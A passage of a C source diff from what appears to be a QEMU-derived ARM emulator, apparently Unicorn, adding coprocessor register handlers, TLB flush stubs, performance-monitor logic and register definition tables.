(cpreg_field_is_64bit(ri)) { + return CPREG_FIELD64(env, ri); + } else { + return CPREG_FIELD32(env, ri); + } +} + +static void raw_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + if (cpreg_field_is_64bit(ri)) { + CPREG_FIELD64(env, ri) = value; + } else { + CPREG_FIELD32(env, ri) = value; + } +} + +static uint64_t read_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Raw read of a coprocessor register (as needed for migration, etc). */ + if (ri->type & ARM_CP_CONST) { + return ri->resetvalue; + } else if (ri->raw_readfn) { + return ri->raw_readfn(env, ri); + } else if (ri->readfn) { + return ri->readfn(env, ri); + } else { + return raw_read(env, ri); + } +} + +static void write_raw_cp_reg(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t v) +{ + /* Raw write of a coprocessor register (as needed for migration, etc). + * Note that constant registers are treated as write-ignored; the + * caller should check for success by whether a readback gives the + * value written. 
+ */ + if (ri->type & ARM_CP_CONST) { + return; + } else if (ri->raw_writefn) { + ri->raw_writefn(env, ri, v); + } else if (ri->writefn) { + ri->writefn(env, ri, v); + } else { + raw_write(env, ri, v); + } +} + +bool write_cpustate_to_list(ARMCPU *cpu) +{ + /* Write the coprocessor state from cpu->env to the (index,value) list. */ + int i; + bool ok = true; + + for (i = 0; i < cpu->cpreg_array_len; i++) { + uint32_t regidx = kvm_to_cpreg_id(cpu->cpreg_indexes[i]); + const ARMCPRegInfo *ri; + + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + if (!ri) { + ok = false; + continue; + } + if (ri->type & ARM_CP_NO_MIGRATE) { + continue; + } + cpu->cpreg_values[i] = read_raw_cp_reg(&cpu->env, ri); + } + return ok; +} + +bool write_list_to_cpustate(ARMCPU *cpu) +{ + int i; + bool ok = true; + + for (i = 0; i < cpu->cpreg_array_len; i++) { + uint32_t regidx = kvm_to_cpreg_id(cpu->cpreg_indexes[i]); + uint64_t v = cpu->cpreg_values[i]; + const ARMCPRegInfo *ri; + + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + if (!ri) { + ok = false; + continue; + } + if (ri->type & ARM_CP_NO_MIGRATE) { + continue; + } + /* Write value and confirm it reads back as written + * (to catch read-only registers and partially read-only + * registers where the incoming migration value doesn't match) + */ + write_raw_cp_reg(&cpu->env, ri, v); + if (read_raw_cp_reg(&cpu->env, ri) != v) { + ok = false; + } + } + return ok; +} + +static void add_cpreg_to_list(gpointer key, gpointer opaque) +{ + ARMCPU *cpu = opaque; + uint64_t regidx; + const ARMCPRegInfo *ri; + + regidx = *(uint32_t *)key; + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + + if (!(ri->type & ARM_CP_NO_MIGRATE)) { + cpu->cpreg_indexes[cpu->cpreg_array_len] = cpreg_to_kvm_id(regidx); + /* The value array need not be initialized at this point */ + cpu->cpreg_array_len++; + } +} + +static void count_cpreg(gpointer key, gpointer opaque) +{ + ARMCPU *cpu = opaque; + uint64_t regidx; + const ARMCPRegInfo *ri; + + regidx = *(uint32_t 
*)key; + ri = get_arm_cp_reginfo(cpu->cp_regs, regidx); + + if (!(ri->type & ARM_CP_NO_MIGRATE)) { + cpu->cpreg_array_len++; + } +} + +static gint cpreg_key_compare(gconstpointer a, gconstpointer b) +{ + uint64_t aidx = cpreg_to_kvm_id(*(uint32_t *)a); + uint64_t bidx = cpreg_to_kvm_id(*(uint32_t *)b); + + if (aidx > bidx) { + return 1; + } + if (aidx < bidx) { + return -1; + } + return 0; +} + +static void cpreg_make_keylist(gpointer key, gpointer value, gpointer udata) +{ + GList **plist = udata; + + *plist = g_list_prepend(*plist, key); +} + +void init_cpreg_list(ARMCPU *cpu) +{ + /* Initialise the cpreg_tuples[] array based on the cp_regs hash. + * Note that we require cpreg_tuples[] to be sorted by key ID. + */ + GList *keys = NULL; + int arraylen; + + g_hash_table_foreach(cpu->cp_regs, cpreg_make_keylist, &keys); + + keys = g_list_sort(keys, cpreg_key_compare); + + cpu->cpreg_array_len = 0; + + g_list_foreach(keys, count_cpreg, cpu); + + arraylen = cpu->cpreg_array_len; + cpu->cpreg_indexes = g_new(uint64_t, arraylen); + cpu->cpreg_values = g_new(uint64_t, arraylen); + cpu->cpreg_vmstate_indexes = g_new(uint64_t, arraylen); + cpu->cpreg_vmstate_values = g_new(uint64_t, arraylen); + cpu->cpreg_vmstate_array_len = cpu->cpreg_array_len; + cpu->cpreg_array_len = 0; + + g_list_foreach(keys, add_cpreg_to_list, cpu); + + assert(cpu->cpreg_array_len == arraylen); + + g_list_free(keys); +} + +static void dacr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + raw_write(env, ri, value); + tlb_flush(CPU(cpu), 1); /* Flush TLB as domain not tracked in TLB */ +} + +static void fcse_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (raw_read(env, ri) != value) { + /* Unlike real hardware the qemu TLB uses virtual addresses, + * not modified virtual addresses, so this causes a TLB flush. 
+ */ + tlb_flush(CPU(cpu), 1); + raw_write(env, ri, value); + } +} + +static void contextidr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + + if (raw_read(env, ri) != value && !arm_feature(env, ARM_FEATURE_MPU) + && !extended_addresses_enabled(env)) { + /* For VMSA (when not using the LPAE long descriptor page table + * format) this register includes the ASID, so do a TLB flush. + * For PMSA it is purely a process ID and no action is needed. + */ + tlb_flush(CPU(cpu), 1); + } + raw_write(env, ri, value); +} + +static void tlbiall_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate all (TLBIALL) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush(CPU(cpu), 1); +} + +static void tlbimva_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate single TLB entry by MVA and ASID (TLBIMVA) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush_page(CPU(cpu), value & TARGET_PAGE_MASK); +} + +static void tlbiasid_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate by ASID (TLBIASID) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush(CPU(cpu), value == 0); +} + +static void tlbimvaa_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Invalidate single entry by MVA, all ASIDs (TLBIMVAA) */ + ARMCPU *cpu = arm_env_get_cpu(env); + + tlb_flush_page(CPU(cpu), value & TARGET_PAGE_MASK); +} + +/* IS variants of TLB operations must affect all cores */ +static void tlbiall_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, 1); +} + +static void tlbiasid_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, value == 0); +} + +static void tlbimva_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + 
uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, value & TARGET_PAGE_MASK); +} + +static void tlbimvaa_is_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + //struct uc_struct *uc = env->uc; + // TODO: issue #642 + // tlb_flush(other_cpu, value & TARGET_PAGE_MASK); +} + +static const ARMCPRegInfo cp_reginfo[] = { + { "FCSEIDR", 15,13,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c13_fcse), + NULL, NULL, fcse_write, NULL, raw_write, NULL, }, + { "CONTEXTIDR", 0,13,0, 3,0,1, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.contextidr_el1), + NULL, NULL, contextidr_write, NULL, raw_write, NULL, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo not_v8_cp_reginfo[] = { + /* NB: Some of these registers exist in v8 but with more precise + * definitions that don't use CP_ANY wildcards (mostly in v8_cp_reginfo[]). + */ + /* MMU Domain access control / MPU write buffer control */ + { "DACR", 15,3,CP_ANY, 0,CP_ANY,CP_ANY, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c3), + NULL, NULL, dacr_write, NULL, raw_write, NULL, }, + /* ??? This covers not just the impdef TLB lockdown registers but also + * some v7VMSA registers relating to TEX remap, so it is overly broad. + */ + { "TLB_LOCKDOWN", 15,10,CP_ANY, 0,CP_ANY,CP_ANY, 0, + ARM_CP_NOP, PL1_RW, }, + /* Cache maintenance ops; some of this space may be overridden later. */ + { "CACHEMAINT", 15,7,CP_ANY, 0,0,CP_ANY, 0, + ARM_CP_NOP | ARM_CP_OVERRIDE, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo not_v6_cp_reginfo[] = { + /* Not all pre-v6 cores implemented this WFI, so this is slightly + * over-broad. + */ + { "WFI_v5", 15,7,8, 0,0,2, 0, + ARM_CP_WFI, PL1_W, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo not_v7_cp_reginfo[] = { + /* Standard v6 WFI (also used in some pre-v6 cores); not in v7 (which + * is UNPREDICTABLE; we choose to NOP as most implementations do). 
+ */ + { "WFI_v6", 15,7,0, 0,0,4, 0, + ARM_CP_WFI, PL1_W, }, + /* L1 cache lockdown. Not architectural in v6 and earlier but in practice + * implemented in 926, 946, 1026, 1136, 1176 and 11MPCore. StrongARM and + * OMAPCP will override this space. + */ + { "DLOCKDOWN", 15,9,0, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_data), }, + { "ILOCKDOWN", 15,9,0, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_insn), }, + /* v6 doesn't have the cache ID registers but Linux reads them anyway */ + { "DUMMY", 15,0,0, 0,1,CP_ANY, 0, + ARM_CP_CONST | ARM_CP_NO_MIGRATE, PL1_R, NULL, 0 }, + /* We don't implement pre-v7 debug but most CPUs had at least a DBGDIDR; + * implementing it as RAZ means the "debug architecture version" bits + * will read as a reserved value, which should cause Linux to not try + * to use the debug hardware. + */ + { "DBGDIDR", 14,0,0, 0,0,0, 0, + ARM_CP_CONST, PL0_R, NULL, 0 }, + /* MMU TLB control. Note that the wildcarding means we cover not just + * the unified TLB ops but also the dside/iside/inner-shareable variants. + */ + { "TLBIALL", 15,8,CP_ANY, 0,CP_ANY,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write, }, + { "TLBIMVA", 15,8,CP_ANY, 0,CP_ANY,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write, }, + { "TLBIASID", 15,8,CP_ANY, 0,CP_ANY,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write, }, + { "TLBIMVAA", 15,8,CP_ANY, 0,CP_ANY,3, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_write, }, + REGINFO_SENTINEL +}; + +static void cpacr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + uint32_t mask = 0; + + /* In ARMv8 most bits of CPACR_EL1 are RES0. */ + if (!arm_feature(env, ARM_FEATURE_V8)) { + /* ARMv7 defines bits for unimplemented coprocessors as RAZ/WI. + * ASEDIS [31] and D32DIS [30] are both UNK/SBZP without VFP. + * TRCDIS [28] is RAZ/WI since we do not implement a trace macrocell. 
+ */ + if (arm_feature(env, ARM_FEATURE_VFP)) { + /* VFP coprocessor: cp10 & cp11 [23:20] */ + mask |= (1U << 31) | (1 << 30) | (0xf << 20); + + if (!arm_feature(env, ARM_FEATURE_NEON)) { + /* ASEDIS [31] bit is RAO/WI */ + value |= (1U << 31); + } + + /* VFPv3 and upwards with NEON implement 32 double precision + * registers (D0-D31). + */ + if (!arm_feature(env, ARM_FEATURE_NEON) || + !arm_feature(env, ARM_FEATURE_VFP3)) { + /* D32DIS [30] is RAO/WI if D16-31 are not implemented. */ + value |= (1 << 30); + } + } + value &= mask; + } + env->cp15.c1_coproc = value; +} + +static const ARMCPRegInfo v6_cp_reginfo[] = { + /* prefetch by MVA in v6, NOP in v7 */ + { "MVA_prefetch", 15,7,13, 0,0,1, 0, + ARM_CP_NOP, PL1_W, }, + { "ISB", 15,7,5, 0,0,4, 0, + ARM_CP_NOP, PL0_W, }, + { "DSB", 15,7,10, 0,0,4, 0, + ARM_CP_NOP, PL0_W, }, + { "DMB", 15,7,10, 0,0,5, 0, + ARM_CP_NOP, PL0_W, }, + { "IFAR", 15,6,0, 0,0,2, 0, + 0, PL1_RW, NULL, 0, offsetofhigh32(CPUARMState, cp15.far_el[1]), }, + /* Watchpoint Fault Address Register : should actually only be present + * for 1136, 1176, 11MPCore. + */ + { "WFAR", 15,6,0, 0,0,1, 0, + ARM_CP_CONST, PL1_RW, NULL, 0, }, + { "CPACR", 0,1,0, 3,0,2, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c1_coproc), + NULL, NULL, cpacr_write }, + REGINFO_SENTINEL +}; + +static CPAccessResult pmreg_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + /* Performance monitor registers user accessibility is controlled + * by PMUSERENR. 
+ */ + if (arm_current_el(env) == 0 && !env->cp15.c9_pmuserenr) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +#ifndef CONFIG_USER_ONLY + +static inline bool arm_ccnt_enabled(CPUARMState *env) +{ + /* This does not support checking PMCCFILTR_EL0 register */ + + if (!(env->cp15.c9_pmcr & PMCRE)) { + return false; + } + + return true; +} + +void pmccntr_sync(CPUARMState *env) +{ + uint64_t temp_ticks; + + temp_ticks = muldiv64(qemu_clock_get_us(QEMU_CLOCK_VIRTUAL), + get_ticks_per_sec(), 1000000); + + if (env->cp15.c9_pmcr & PMCRD) { + /* Increment once every 64 processor clock cycles */ + temp_ticks /= 64; + } + + if (arm_ccnt_enabled(env)) { + env->cp15.c15_ccnt = temp_ticks - env->cp15.c15_ccnt; + } +} + +static void pmcr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + pmccntr_sync(env); + + if (value & PMCRC) { + /* The counter has been reset */ + env->cp15.c15_ccnt = 0; + } + + /* only the DP, X, D and E bits are writable */ + env->cp15.c9_pmcr &= ~0x39; + env->cp15.c9_pmcr |= (value & 0x39); + + pmccntr_sync(env); +} + +static uint64_t pmccntr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + uint64_t total_ticks; + + if (!arm_ccnt_enabled(env)) { + /* Counter is disabled, do not change value */ + return env->cp15.c15_ccnt; + } + + total_ticks = muldiv64(qemu_clock_get_us(QEMU_CLOCK_VIRTUAL), + get_ticks_per_sec(), 1000000); + + if (env->cp15.c9_pmcr & PMCRD) { + /* Increment once every 64 processor clock cycles */ + total_ticks /= 64; + } + return total_ticks - env->cp15.c15_ccnt; +} + +static void pmccntr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + uint64_t total_ticks; + + if (!arm_ccnt_enabled(env)) { + /* Counter is disabled, set the absolute value */ + env->cp15.c15_ccnt = value; + return; + } + + total_ticks = muldiv64(qemu_clock_get_us(QEMU_CLOCK_VIRTUAL), + get_ticks_per_sec(), 1000000); + + if (env->cp15.c9_pmcr & PMCRD) { + /* Increment once every 64 processor clock cycles */ + 
total_ticks /= 64; + } + env->cp15.c15_ccnt = total_ticks - value; +} + +static void pmccntr_write32(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + uint64_t cur_val = pmccntr_read(env, NULL); + + pmccntr_write(env, ri, deposit64(cur_val, 0, 32, value)); +} + +#else /* CONFIG_USER_ONLY */ + +void pmccntr_sync(CPUARMState *env) +{ +} + +#endif + +static void pmccfiltr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + pmccntr_sync(env); + env->cp15.pmccfiltr_el0 = value & 0x7E000000; + pmccntr_sync(env); +} + +static void pmcntenset_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= (1U << 31); + env->cp15.c9_pmcnten |= value; +} + +static void pmcntenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= (1U << 31); + env->cp15.c9_pmcnten &= ~value; +} + +static void pmovsr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c9_pmovsr &= ~value; +} + +static void pmxevtyper_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c9_pmxevtyper = value & 0xff; +} + +static void pmuserenr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + env->cp15.c9_pmuserenr = value & 1; +} + +static void pmintenset_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* We have no event counters so only the C bit can be changed */ + value &= (1U << 31); + env->cp15.c9_pminten |= value; +} + +static void pmintenclr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= (1U << 31); + env->cp15.c9_pminten &= ~value; +} + +static void vbar_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + /* Note that even though the AArch64 view of this register has bits + * [10:0] all RES0 we can only mask the bottom 5, to comply with the + * architectural requirements for bits which are RES0 only in some + * contexts. 
(ARMv8 would permit us to do no masking at all, but ARMv7 + * requires the bottom five bits to be RAZ/WI because they're UNK/SBZP.) + */ + raw_write(env, ri, value & ~0x1FULL); +} + +static void scr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) +{ + /* We only mask off bits that are RES0 both for AArch64 and AArch32. + * For bits that vary between AArch32/64, code needs to check the + * current execution mode before directly using the feature bit. + */ + uint32_t valid_mask = SCR_AARCH64_MASK | SCR_AARCH32_MASK; + + if (!arm_feature(env, ARM_FEATURE_EL2)) { + valid_mask &= ~SCR_HCE; + + /* On ARMv7, SMD (or SCD as it is called in v7) is only + * supported if EL2 exists. The bit is UNK/SBZP when + * EL2 is unavailable. In QEMU ARMv7, we force it to always zero + * when EL2 is unavailable. + */ + if (arm_feature(env, ARM_FEATURE_V7)) { + valid_mask &= ~SCR_SMD; + } + } + + /* Clear all-context RES0 bits. */ + value &= valid_mask; + raw_write(env, ri, value); +} + +static uint64_t ccsidr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + ARMCPU *cpu = arm_env_get_cpu(env); + return cpu->ccsidr[env->cp15.c0_cssel]; +} + +static void csselr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + raw_write(env, ri, value & 0xf); +} + +static uint64_t isr_read(CPUARMState *env, const ARMCPRegInfo *ri) +{ + CPUState *cs = ENV_GET_CPU(env); + uint64_t ret = 0; + + if (cs->interrupt_request & CPU_INTERRUPT_HARD) { + ret |= CPSR_I; + } + if (cs->interrupt_request & CPU_INTERRUPT_FIQ) { + ret |= CPSR_F; + } + /* External aborts are not possible in QEMU so A bit is always clear */ + return ret; +} + +static const ARMCPRegInfo v7_cp_reginfo[] = { + /* the old v6 WFI, UNPREDICTABLE in v7 but we choose to NOP */ + { "NOP", 15,7,0, 0,0,4, 0, + ARM_CP_NOP, PL1_W, }, + /* Performance monitors are implementation defined in v7, + * but with an ARM recommended set of registers, which we + * follow (although we don't actually implement any counters) + * 
+ * Performance registers fall into three categories: + * (a) always UNDEF in PL0, RW in PL1 (PMINTENSET, PMINTENCLR) + * (b) RO in PL0 (ie UNDEF on write), RW in PL1 (PMUSERENR) + * (c) UNDEF in PL0 if PMUSERENR.EN==0, otherwise accessible (all others) + * For the cases controlled by PMUSERENR we must set .access to PL0_RW + * or PL0_RO as appropriate and then check PMUSERENR in the helper fn. + */ + { "PMCNTENSET", 15,9,12, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenset_write, NULL, raw_write }, + { "PMCNTENSET_EL0", 0,9,12, 3,3,1, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenset_write, NULL, raw_write }, + { "PMCNTENCLR", 15,9,12, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenclr_write, }, + { "PMCNTENCLR_EL0", 0,9,12, 3,3,2, ARM_CP_STATE_AA64, + ARM_CP_NO_MIGRATE, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmcnten), + pmreg_access, NULL, pmcntenclr_write }, + { "PMOVSR", 15,9,12, 0,0,3, 0, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmovsr), + pmreg_access, NULL, pmovsr_write, NULL, raw_write }, + /* Unimplemented so WI. */ + { "PMSWINC", 15,9,12, 0,0,4, 0, + ARM_CP_NOP, PL0_W, NULL, 0, 0, + pmreg_access, }, + /* Since we don't implement any events, writing to PMSELR is UNPREDICTABLE. + * We choose to RAZ/WI. 
+ */ + { "PMSELR", 15,9,12, 0,0,5, 0, + ARM_CP_CONST, PL0_RW, NULL, 0, 0, + pmreg_access }, +#ifndef CONFIG_USER_ONLY + { "PMCCNTR", 15,9,13, 0,0,0, 0, + ARM_CP_IO, PL0_RW, NULL, 0, 0, + pmreg_access, pmccntr_read, pmccntr_write32, }, + { "PMCCNTR_EL0", 0,9,13, 3,3,0, ARM_CP_STATE_AA64, + ARM_CP_IO, PL0_RW, NULL, 0, 0, + pmreg_access, pmccntr_read, pmccntr_write, }, +#endif + { "PMCCFILTR_EL0", 0,14,15, 3,3,7, ARM_CP_STATE_AA64, + ARM_CP_IO, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.pmccfiltr_el0), + pmreg_access, NULL, pmccfiltr_write, }, + { "PMXEVTYPER", 15,9,13, 0,0,1, 0, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmxevtyper), + pmreg_access, NULL, pmxevtyper_write, NULL, raw_write }, + /* Unimplemented, RAZ/WI. */ + { "PMXEVCNTR", 15,9,13, 0,0,2, 0, + ARM_CP_CONST, PL0_RW, NULL, 0, 0, + pmreg_access }, + { "PMUSERENR", 15,9,14, 0,0,0, 0, + 0, PL0_R | PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pmuserenr), + NULL, NULL, pmuserenr_write, NULL, raw_write }, + { "PMINTENSET", 15,9,14, 0,0,1, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pminten), + NULL, NULL, pmintenset_write, NULL, raw_write }, + { "PMINTENCLR", 15,9,14, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c9_pminten), + NULL, NULL, pmintenclr_write, }, + { "VBAR", 0,12,0, 3,0,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.vbar_el[1]), + NULL, NULL, vbar_write, }, + { "SCR", 15,1,1, 0,0,0, 0, + 0, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.scr_el3), + NULL, NULL, scr_write }, + { "CCSIDR", 0,0,0, 3,1,0, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, 0, + NULL, ccsidr_read, }, + { "CSSELR", 0,0,0, 3,2,0, ARM_CP_STATE_BOTH, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.c0_cssel), + NULL, NULL, csselr_write, }, + /* Auxiliary ID register: this actually has an IMPDEF value but for now + * just RAZ for all cores: + */ + { "AIDR", 0,0,0, 3,1,7, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_R, NULL, 0 }, + /* Auxiliary 
fault status registers: these also are IMPDEF, and we + * choose to RAZ/WI for all cores. + */ + { "AFSR0_EL1", 0,5,1, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + { "AFSR1_EL1", 0,5,1, 3,0,1, ARM_CP_STATE_BOTH, + ARM_CP_CONST, PL1_RW, NULL, 0 }, + /* MAIR can just read-as-written because we don't implement caches + * and so don't need to care about memory attributes. + */ + { "MAIR_EL1", 0,10,2, 3,0,0, ARM_CP_STATE_AA64, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, cp15.mair_el1), }, + /* For non-long-descriptor page tables these are PRRR and NMRR; + * regardless they still act as reads-as-written for QEMU. + * The override is necessary because of the overly-broad TLB_LOCKDOWN + * definition. + */ + { "MAIR0", 15,10,2, 0,0,0, ARM_CP_STATE_AA32, + ARM_CP_OVERRIDE, PL1_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.mair_el1), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "MAIR1", 15,10,2, 0,0,1, ARM_CP_STATE_AA32, + ARM_CP_OVERRIDE, PL1_RW, NULL, 0, offsetofhigh32(CPUARMState, cp15.mair_el1), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "ISR_EL1", 0,12,1, 3,0,0, ARM_CP_STATE_BOTH, + ARM_CP_NO_MIGRATE, PL1_R, NULL, 0, 0, + NULL, isr_read }, + /* 32 bit ITLB invalidates */ + { "ITLBIALL", 15,8,5, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "ITLBIMVA", 15,8,5, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "ITLBIASID", 15,8,5, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write }, + /* 32 bit DTLB invalidates */ + { "DTLBIALL", 15,8,6, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_write }, + { "DTLBIMVA", 15,8,6, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "DTLBIASID", 15,8,6, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write }, + /* 32 bit TLB invalidates */ + { "TLBIALL", 15,8,7, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 
0, + NULL, NULL, tlbiall_write }, + { "TLBIMVA", 15,8,7, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_write }, + { "TLBIASID", 15,8,7, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_write }, + { "TLBIMVAA", 15,8,7, 0,0,3, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_write }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo v7mp_cp_reginfo[] = { + /* 32 bit TLB invalidates, Inner Shareable */ + { "TLBIALLIS", 15,8,3, 0,0,0, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiall_is_write }, + { "TLBIMVAIS", 15,8,3, 0,0,1, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimva_is_write }, + { "TLBIASIDIS", 15,8,3, 0,0,2, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbiasid_is_write }, + { "TLBIMVAAIS", 15,8,3, 0,0,3, 0, + ARM_CP_NO_MIGRATE, PL1_W, NULL, 0, 0, + NULL, NULL, tlbimvaa_is_write }, + REGINFO_SENTINEL +}; + +static void teecr_write(CPUARMState *env, const ARMCPRegInfo *ri, + uint64_t value) +{ + value &= 1; + env->teecr = value; +} + +static CPAccessResult teehbr_access(CPUARMState *env, const ARMCPRegInfo *ri) +{ + if (arm_current_el(env) == 0 && (env->teecr & 1)) { + return CP_ACCESS_TRAP; + } + return CP_ACCESS_OK; +} + +static const ARMCPRegInfo t2ee_cp_reginfo[] = { + { "TEECR", 14,0,0, 0,6,0, 0, + 0, PL1_RW, NULL, 0, offsetof(CPUARMState, teecr), + NULL, NULL, teecr_write }, + { "TEEHBR", 14,1,0, 0,6,0, 0, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, teehbr), + teehbr_access, }, + REGINFO_SENTINEL +}; + +static const ARMCPRegInfo v6k_cp_reginfo[] = { + { "TPIDR_EL0", 0,13,0, 3,3,2, ARM_CP_STATE_AA64, + 0, PL0_RW, NULL, 0, offsetof(CPUARMState, cp15.tpidr_el0), }, + { "TPIDRURW", 15,13,0, 0,0,2, 0, + 0, PL0_RW, NULL, 0, offsetoflow32(CPUARMState, cp15.tpidr_el0), + NULL, NULL, NULL, NULL, NULL, arm_cp_reset_ignore }, + { "TPIDRRO_EL0", 0,13,0, 3,3,3, ARM_CP_STATE_AA64, + 0, PL0_R|PL1_W, NULL, 0, offsetof(CPUARMState, cp15.tpidrro_el0) }, + { 
